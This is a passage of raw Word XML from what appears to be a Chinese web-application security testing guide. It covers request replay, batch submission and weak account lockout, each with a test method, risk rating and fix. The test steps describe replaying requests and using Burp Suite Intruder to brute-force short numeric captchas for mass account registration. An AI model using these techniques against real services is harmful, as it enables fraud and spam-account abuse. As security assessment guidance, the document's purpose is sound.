    <w:p w14:paraId="7623B14F" w14:textId="6AF08410" w:rsidR="009145B3" w:rsidRPr="00E0174D" w:rsidRDefault="009145B3" w:rsidP="00E0174D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="008D70E9" w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重放</w:t>
      </w:r>
      <w:r w:rsidR="008D70E9" w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http/tcp</w:t>
      </w:r>
      <w:r w:rsidR="008D70E9" w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求，查看</w:t>
      </w:r>
      <w:r w:rsidR="00E52431" w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二次请求是否被正常处理</w:t>
      </w:r>
      <w:r w:rsidR="008D70E9" w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC8B9F0" w14:textId="6FC6519A" w:rsidR="009145B3" w:rsidRPr="00E0174D" w:rsidRDefault="00C24790" w:rsidP="00E0174D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="009145B3" w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00554EE6" w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者恶意或欺诈性地重复发送一个有效的数据包，如果服务器未检查此类重复提交的请求数据的有效性，那么转账充值等敏感操作将有可能会被重复执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0591FB2A" w14:textId="77777777" w:rsidR="009145B3" w:rsidRPr="00E0174D" w:rsidRDefault="009145B3" w:rsidP="00E0174D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5D3EF7" w14:textId="21D13F26" w:rsidR="009145B3" w:rsidRPr="00E0174D" w:rsidRDefault="008318A9" w:rsidP="00E0174D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：关键业务操作请求未设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> token </w:t>
      </w:r>
      <w:r w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或标识码，导致业务数据越界或错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD128EF" w14:textId="10F8EE02" w:rsidR="009145B3" w:rsidRDefault="009145B3" w:rsidP="004D21F6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00C335CC" w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务端应用程序应检查客户端提交的数据的唯一性，如使用流水号、时间戳、</w:t>
      </w:r>
      <w:r w:rsidR="00C335CC" w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidR="00C335CC" w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等，并将流水号、时间戳等进行签名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A3D413" w14:textId="2C06FD98" w:rsidR="000C0F87" w:rsidRPr="004D21F6" w:rsidRDefault="000C0F87" w:rsidP="004D21F6">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18E675A" w14:textId="7A4304BE" w:rsidR="009145B3" w:rsidRPr="00A82BA3" w:rsidRDefault="00377DC8" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc498434523"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>批量提交</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="7213C222" w14:textId="40AA3F16"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00D340EC" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序未使用验证码等防自动化操作的方法，可批量提交请求，如批量注册。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0B9745"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B73B44" w14:textId="51B4DE36" w:rsidR="009145B3" w:rsidRPr="00395BDF" w:rsidRDefault="009155AE" w:rsidP="00395BDF">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写自动提交</w:t>
      </w:r>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据包的脚本；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6D5DD0" w14:textId="2D9CCFA6" w:rsidR="009155AE" w:rsidRPr="00395BDF" w:rsidRDefault="00EE6728" w:rsidP="00395BDF">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidR="009155AE" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="009155AE" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:r w:rsidR="009155AE" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="009155AE" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>intruder</w:t>
      </w:r>
      <w:r w:rsidR="009155AE" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能批量提交请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674778CC" w14:textId="1B05EFAA" w:rsidR="009145B3" w:rsidRPr="00395BDF" w:rsidRDefault="00C24790" w:rsidP="00395BDF">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="009145B3" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="009344C4" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>注册不需要验证码时</w:t>
      </w:r>
      <w:r w:rsidR="009344C4" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="009344C4" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>攻击者通过编写自动化脚本</w:t>
      </w:r>
      <w:r w:rsidR="009344C4" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="009344C4" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>实现程序自动提交注册信息</w:t>
      </w:r>
      <w:r w:rsidR="009344C4" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；若注册需要验证码，但验证码位数不多于</w:t>
      </w:r>
      <w:r w:rsidR="009344C4" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="009344C4" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位且为纯数字时，通过使用软件</w:t>
      </w:r>
      <w:r w:rsidR="009344C4" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:r w:rsidR="009344C4" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="009344C4" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>intruder</w:t>
      </w:r>
      <w:r w:rsidR="009344C4" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能穷举得到正确的验证码后，再结合自动化脚本工具即可实现批量注册垃圾账号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF2212C"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EF6083" w14:textId="1447D149" w:rsidR="009145B3" w:rsidRPr="00395BDF" w:rsidRDefault="003F21B2" w:rsidP="00395BDF">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：正常业务为单条数据请求，且不存在防自动化批量操作措施，可批量自动化提交。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B34AD25" w14:textId="7A805E88" w:rsidR="003F21B2" w:rsidRPr="00395BDF" w:rsidRDefault="003F21B2" w:rsidP="00395BDF">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：正常业务为单条数据请求，且存在防自动化批量操作措施，但在单个数据包中写入批量数据，可成功提交，并且服务器能批量执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44565F07"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775BCB2D" w14:textId="605FD9E5" w:rsidR="009E6A49" w:rsidRPr="00395BDF" w:rsidRDefault="009E6A49" w:rsidP="00395BDF">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用安全性强的验证码，验证码应从以下方面保证其安全性：验证码长度不低于</w:t>
      </w:r>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位，避免使用容易被程序自动识别的验证码，验证码不应返回客户端。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178E78C2" w14:textId="0F744063" w:rsidR="009E6A49" w:rsidRPr="00395BDF" w:rsidRDefault="009E6A49" w:rsidP="00395BDF">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户注册功能处，提交注册信息后进行邮箱或短信验证通过后再将注册信息写入数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380BC5BD" w14:textId="4C19770A" w:rsidR="009145B3" w:rsidRDefault="009E6A49" w:rsidP="00395BDF">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对同一</w:t>
      </w:r>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址短时间内</w:t>
      </w:r>
      <w:r w:rsidR="009007FF" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提交请求</w:t>
      </w:r>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的次数进行限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233B71BF" w14:textId="22FC7ECB" w:rsidR="000C0F87" w:rsidRPr="00395BDF" w:rsidRDefault="000C0F87" w:rsidP="000C0F87">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819E009" w14:textId="495C0F5F" w:rsidR="00377DC8" w:rsidRPr="00AD537C" w:rsidRDefault="002F529D" w:rsidP="00AD537C">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc498434524"/>
      <w:r w:rsidRPr="00AD537C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>防护功能失效</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="740D3AAF" w14:textId="4E69857D" w:rsidR="009145B3" w:rsidRPr="00A82BA3" w:rsidRDefault="002F529D" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc498434525"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号弱锁定机制</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="745114D0" w14:textId="48DA374F"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00906075" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统帐号锁定时间太短</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204D0EAF" w14:textId="6ECB2F60"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测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00F61DCF" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录时多次输入错误密码，触发账户锁定机制，查看锁定时间是否低于</w:t>
      </w:r>
      <w:r w:rsidR="00F61DCF" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00F61DCF" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分钟。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7458D74F" w14:textId="4C560C1B" w:rsidR="009145B3" w:rsidRPr="00395BDF" w:rsidRDefault="00C24790" w:rsidP="00395BDF">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="009145B3" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="008C2D52" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若账户锁定时间过短，攻击者仍可利用其进行暴力破解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F48F294"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8EDB6C" w14:textId="4786B4DE" w:rsidR="009145B3" w:rsidRPr="00395BDF" w:rsidRDefault="000679F8" w:rsidP="00395BDF">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
